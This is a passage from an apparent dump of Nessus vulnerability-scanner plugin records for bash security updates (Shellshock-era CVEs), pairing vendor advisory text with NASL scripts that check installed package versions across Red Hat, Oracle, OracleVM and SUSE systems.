cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:38", "description": "From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# Oracle Linux Security Advisory ELSA-2014-1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77951);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004484.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004486.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:38:03", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in parameter expansion Resolves: #1283829\n\n - Fix a race condition in saving bash history on shutdown Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-30T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0050.NASL", "href": "https://www.tenable.com/plugins/nessus/99077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0050.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99077);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-7169\",\n \"CVE-2016-0634\",\n \"CVE-2016-7543\",\n \"CVE-2016-9401\"\n );\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second\n sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via\n SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via\n malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long\n strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in\n parameter expansion Resolves: #1283829\n\n - Fix a race condition in saving bash history on shutdown\n Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error\n Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst\n Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000659.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49d2a21e\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000669.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?85c795b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:20", "description": "This patch was withdrawn by the openSUSE team, as the software was fixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over BASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents and for loop issue", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2014-567.NASL", "href": "https://www.tenable.com/plugins/nessus/78115", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-567.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\n# @DEPRECATED@\n#\n# This script has been deprecated as it has been determined that the\n# advisory was withdrawn and fixed prior to release of openSUSE 13.2.\n#\n# Disabled on 2015/11/02.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78115);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)\");\n script_summary(english:\"Check for the openSUSE-2014-567 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This patch was withdrawn by the openSUSE team, as the software was\nfixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over\nBASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE\ndocuments and for loop issue\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-09/msg00063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=895475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The advisory was withdrawn by the vendor as the patch is not needed.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debugsource-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-devel-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-lang-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-debuginfo-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"readline-devel-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-75.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_. This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9780)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140926.NASL", "href": "https://www.tenable.com/plugins/nessus/77958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77958);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 